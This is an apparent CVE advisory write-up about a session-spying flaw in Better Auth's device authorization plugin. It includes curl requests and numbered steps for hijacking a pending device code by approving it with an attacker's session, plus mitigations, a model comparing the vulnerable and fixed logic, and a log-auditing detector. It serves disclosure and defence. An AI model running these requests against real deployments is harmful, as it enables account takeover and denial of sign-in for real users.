CVE-2026-45337 is a session spying vulnerability in Better Auth’s `deviceAuthorization` plugin. When the plugin is enabled and a third party can observe a pending user code before the legitimate user completes verification, any authenticated attacker can hijack the device flow.

The core flaw is that the plugin treats any authenticated session as the owner of any pending device code. The ownership check on `POST /device/approve` and `POST /device/deny` short-circuits when the database row’s `userId` is unset: instead of rejecting a request for an unclaimed code, it accepts whichever authenticated caller arrives first. Meanwhile, the `GET /device` verification handler never claims the row, so the legitimate user’s verification step does not establish ownership either. An attacker who learns a valid `user_code` (via shoulder surfing, screen sharing, logs, etc.) can therefore claim the device session before the legitimate user completes approval, and either bind the polling device to the attacker’s own account (account takeover) or deny the code and block the legitimate sign-in (denial of service). This is the “Session Spying” risk class described in RFC 8628 §5.5.

The fix ships in better-auth@1.6.11: `GET /device` now claims the pending row for the calling session, and the approve and deny endpoints require strict equality between the row’s owner and the calling session. A consequence for custom verification pages is that they must request `GET /device` with the user’s authenticated session; otherwise the row is never claimed and the later approve call is rejected. Note that this closes the race once the legitimate user has verified the code; an attacker who enters an observed code before the legitimate user does can still claim it under the described semantics, which is why keeping `expiresIn` short matters even after upgrading. If you cannot upgrade immediately, workarounds include disabling the plugin, adding a `before` hook that tracks session ownership, or shortening the `expiresIn` lifetime of device codes.
DailyCVE Form:
Platform: better-auth
Version: >=1.6.0<1.6.11
Vulnerability: Session Spying
Severity: High (7.6)
Date: 2026-06-04
Prediction: 2026-05-12 (patched)
What Undercode Say:
Check the currently installed version (versions >=1.6.0 and <1.6.11 are affected):
npm list better-auth
or
yarn list better-auth
Determine whether the deviceAuthorization plugin is enabled:
look for 'deviceAuthorization(' in the plugins array of your auth configuration file.
Reproduce against your own test instance only. Start a device flow and capture the pending 'user_code' from the response; this stands in for the attacker observing the code on the victim's screen or in logs. Send whatever request body your plugin configuration requires (an RFC 8628 device authorization request carries at least the client identifier):
curl -X POST http://localhost:3000/api/auth/device/code \
  -H "Content-Type: application/json" \
  -d '<device authorization request body>'
Exploit attempt (conceptual). With the captured 'user_code' and a session cookie belonging to the attacker's own account (the cookie name depends on your configuration), verify the code:
curl -X GET "http://localhost:3000/api/auth/device?user_code=<captured_code>" \
  -H "Cookie: session=<attacker_session>"
Then approve it before the legitimate user does. On a vulnerable version the approval is accepted because the row has no owner yet and the ownership check short-circuits:
curl -X POST http://localhost:3000/api/auth/device/approve \
  -H "Content-Type: application/json" \
  -H "Cookie: session=<attacker_session>" \
  -d '{"user_code":"<captured_code>"}'
On 1.6.11 or later, once the legitimate user has served GET /device with the code, the attacker's POST /device/approve is rejected because the row's owner no longer matches the attacker's session.
Exploit:
- Identify target application using `better-auth` version >=1.6.0, <1.6.11 with `deviceAuthorization` plugin enabled.
- Obtain a valid `user_code` from the device flow initiation (e.g., by shoulder surfing, screen sharing, or intercepting logs).
- As an authenticated attacker, send a `GET /device` request with the observed `user_code` and the attacker’s session cookie (on vulnerable versions this step is optional, since the approve handler accepts any authenticated session while the row has no owner).
- Immediately send a `POST /device/approve` request with the same `user_code` and session cookie, before the legitimate user approves.
- The vulnerable plugin binds the device session to the attacker’s account instead of the legitimate user.
Protection:
– Immediate Upgrade: Update to `better-auth@1.6.11` or later.
– Disable Plugin: Remove `deviceAuthorization()` from the `plugins` array in your auth configuration if the device flow is not required.
– Add a `before` Hook: Implement a custom hook on `POST /device/approve` and `POST /device/deny` that tracks which session called `GET /device` for each user code, and rejects requests from mismatched sessions.
– Shorten Expiry: Reduce the `expiresIn` plugin option to minimize the window during which an observed user code remains valid.
– Monitor Logs: Audit access logs for `POST /device/approve` and `POST /device/deny` to detect unauthorized approval attempts.
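The following is an added example, not code from the page or from Better Auth. It models the ownership logic described above in memory, with the vulnerable check (GET /device never claims the row, approve/deny accept any authenticated caller while `userId` is unset) beside the corrected check (GET /device claims the row, approve/deny require strict owner equality), which is also the logic a `before` hook workaround has to reproduce with its own ownership map. The row store, the session object shape, the `expiresIn` handling and every function name are assumptions made for this example, not the plugin's API.

```javascript
// Added example, not Better Auth's code: an in-memory model of the ownership
// logic the write-up describes. The row store, the session object shape and
// every function name below are assumptions made for this example.
const rows = new Map(); // user_code -> { userId, status, expiresAt } (constructed store)
const VICTIM = { userId: "victim" };     // sample sessions (constructed)
const ATTACKER = { userId: "attacker" };

function resetRows() { rows.clear(); }

function issueUserCode(userCode, { now = 0, expiresIn = 600_000 } = {}) {
  rows.set(userCode, { userId: null, status: "pending", expiresAt: now + expiresIn });
}

// Returns the row only while it is pending and unexpired; a shorter expiresIn
// narrows the window in which an observed user_code is useful to anyone.
function livePendingRow(userCode, now) {
  const row = rows.get(userCode);
  if (!row || row.status !== "pending" || now >= row.expiresAt) return null;
  return row;
}

// ---- Vulnerable behaviour, as described for better-auth >=1.6.0 <1.6.11 ----

// GET /device validates the code but does NOT claim the row for the caller.
function verifyVulnerable(session, userCode, now = 0) {
  return livePendingRow(userCode, now) ? { ok: true } : { ok: false, reason: "invalid_code" };
}

// POST /device/approve|deny: the owner check short-circuits when userId is
// unset, so the first authenticated session to call it wins the row.
function decideVulnerable(session, userCode, decision, now = 0) {
  const row = livePendingRow(userCode, now);
  if (!row) return { ok: false, reason: "invalid_code" };
  const isOwner = row.userId == null || row.userId === session.userId; // the flaw
  if (!isOwner) return { ok: false, reason: "not_owner" };
  row.userId = session.userId;
  row.status = decision;
  return { ok: true, boundTo: row.userId };
}

// ---- Corrected behaviour: what 1.6.11 enforces and what a before-hook
// workaround has to reproduce with its own ownership map ----

// GET /device: the authenticated session that verifies the code claims the row.
function verifyFixed(session, userCode, now = 0) {
  const row = livePendingRow(userCode, now);
  if (!row) return { ok: false, reason: "invalid_code" };
  if (row.userId !== null && row.userId !== session.userId) {
    return { ok: false, reason: "claimed_by_other_session" };
  }
  row.userId = session.userId;
  return { ok: true };
}

// approve/deny require strict equality; an unclaimed row (userId null) is
// rejected instead of being handed to the caller.
function decideFixed(session, userCode, decision, now = 0) {
  const row = livePendingRow(userCode, now);
  if (!row) return { ok: false, reason: "invalid_code" };
  if (row.userId !== session.userId) return { ok: false, reason: "not_owner" };
  row.status = decision;
  return { ok: true, boundTo: row.userId };
}

// Scenario 1: the victim enters the code on the verification page, then the
// attacker (who observed the code) races to approve it first.
function victimVerifiesFirst(verify, decide) {
  resetRows();
  issueUserCode("ABCD-1234");
  verify(VICTIM, "ABCD-1234", 1_000);
  const attack = decide(ATTACKER, "ABCD-1234", "approved", 2_000);
  const victimDecision = decide(VICTIM, "ABCD-1234", "approved", 3_000);
  return { attack, victimDecision, boundTo: rows.get("ABCD-1234").userId };
}

// Scenario 2: the attacker never touches GET /device and goes straight to deny.
function attackerSkipsVerification(decide) {
  resetRows();
  issueUserCode("EFGH-5678");
  return decide(ATTACKER, "EFGH-5678", "denied", 1_000);
}

// Scenario 3: the attacker is late; with a short expiresIn the code is dead.
function attackerAfterExpiry(verify, decide, expiresIn) {
  resetRows();
  issueUserCode("IJKL-9012", { now: 0, expiresIn });
  verify(ATTACKER, "IJKL-9012", expiresIn + 1);
  return decide(ATTACKER, "IJKL-9012", "approved", expiresIn + 2);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [label, verify, decide] of [
    ["vulnerable", verifyVulnerable, decideVulnerable],
    ["fixed", verifyFixed, decideFixed],
  ]) {
    console.log(label, victimVerifiesFirst(verify, decide), attackerSkipsVerification(decide));
  }
}
```

Run it with node to see the two behaviours side by side: in scenario 1 the vulnerable model binds the device to `attacker` and the victim's own approval then fails, while the corrected model rejects the attacker with `not_owner` and binds to `victim`. Scenario 2 shows why the `before` hook must reject, not accept, a decision for a code that no session has verified. Scenario 3 is the `expiresIn` workaround: it limits how long an observed code stays usable but, as noted above, does not stop an attacker who enters the code before the legitimate user does.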
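For the log auditing step, this added example (not from the page or from Better Auth) runs a simple detection over a constructed log sample: it flags every `POST /device/approve` or `POST /device/deny` issued by a session that never served `GET /device` for that `user_code`, which is exactly the request the short-circuited owner check lets through on vulnerable versions. The line format, the `sess=` labels and the presence of the user code on POST lines are assumptions for this example; ordinary access logs do not record POST bodies, so a real deployment would have to emit the user code from its own middleware or auth hooks.

```javascript
// Added example, not from the page or from Better Auth. Constructed log sample
// in an assumed format: timestamp, session label, method, request target,
// optional user_code taken from the POST body, HTTP status.
const SAMPLE_LOG = [
  "2026-06-04T10:00:01Z sess=d3 POST /api/auth/device/code 200",
  "2026-06-04T10:00:05Z sess=u7 GET /api/auth/device?user_code=ABCD-1234 200",
  "2026-06-04T10:00:06Z sess=x9 POST /api/auth/device/approve user_code=ABCD-1234 200",
  "2026-06-04T10:00:09Z sess=u7 POST /api/auth/device/approve user_code=ABCD-1234 403",
  "2026-06-04T10:05:00Z sess=u8 GET /api/auth/device?user_code=WXYZ-0001 200",
  "2026-06-04T10:05:03Z sess=u8 POST /api/auth/device/approve user_code=WXYZ-0001 200",
  "2026-06-04T10:07:00Z sess=x9 POST /api/auth/device/deny user_code=QRST-2222 200",
];

const LINE_RE = /^(\S+) sess=(\S+) (GET|POST) (\S+)(?: user_code=(\S+))? (\d{3})$/;

// Parses one line of the assumed format; returns null for anything else.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ts, session, method, target, bodyCode, status] = m;
  const url = new URL(target, "http://localhost");
  return {
    ts, session, method, path: url.pathname,
    userCode: bodyCode ?? url.searchParams.get("user_code"),
    status: Number(status),
  };
}

// Flags every approve/deny whose session never served GET /device for that
// user_code. verifiedBy lists the sessions that did verify it, so an analyst
// can see whether a different (legitimate) session was racing the attacker.
function findSuspiciousDecisions(lines) {
  const verifiedBy = new Map(); // user_code -> Set of sessions that verified it
  const findings = [];
  for (const line of lines) {
    const e = parseLine(line);
    if (!e || !e.userCode) continue;
    if (e.method === "GET" && e.path.endsWith("/device")) {
      if (!verifiedBy.has(e.userCode)) verifiedBy.set(e.userCode, new Set());
      verifiedBy.get(e.userCode).add(e.session);
    } else if (e.method === "POST" && /\/device\/(approve|deny)$/.test(e.path)) {
      const verifiers = verifiedBy.get(e.userCode) ?? new Set();
      if (!verifiers.has(e.session)) {
        findings.push({
          ts: e.ts, session: e.session, userCode: e.userCode,
          path: e.path, status: e.status, verifiedBy: [...verifiers],
        });
      }
    }
  }
  return findings;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(findSuspiciousDecisions(SAMPLE_LOG));
}
```

On the sample this yields two findings: session `x9` approving `ABCD-1234`, a code that only `u7` had verified, and `x9` denying `QRST-2222`, a code nobody had verified. The legitimate user's subsequent 403 on the same code is corroborating evidence of a hijack rather than a separate alert. On 1.6.11 or later, the same pattern of a decision from a non-verifying session should always be accompanied by a rejection status; a success status there is worth investigating.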
Impact:
- Account Takeover: An attacker can bind the polling device to their own session, effectively operating the device as the attacker.
- Denial of Legitimate Sign-in: The attacker can mark the legitimate user’s device code as denied, completely blocking the victim’s authentication flow.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

